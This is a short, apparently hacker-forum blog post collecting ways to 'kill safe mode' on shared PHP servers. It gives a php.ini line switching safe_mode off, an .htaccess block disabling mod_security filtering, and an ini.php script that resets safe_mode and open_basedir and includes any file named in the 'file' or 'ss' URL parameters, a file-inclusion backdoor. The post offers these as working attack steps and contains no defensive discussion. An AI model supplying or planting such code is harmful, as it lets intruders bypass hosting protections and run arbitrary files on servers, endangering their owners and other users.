This will be the subject of a comprehensive all solutions to break the security situation .. All of it has information shared with us until we collect the largest amount of possible solutions
whe need to get all solutions to kill safe mode in server's
ok i will start
php.ini
safe_mode = Off
.htaccess
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
ini.php
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>
Home »Unlabelled » All solutions to break the security Safe Mode To Server's
{ 0 comments... Skip to Comments }
Please comment here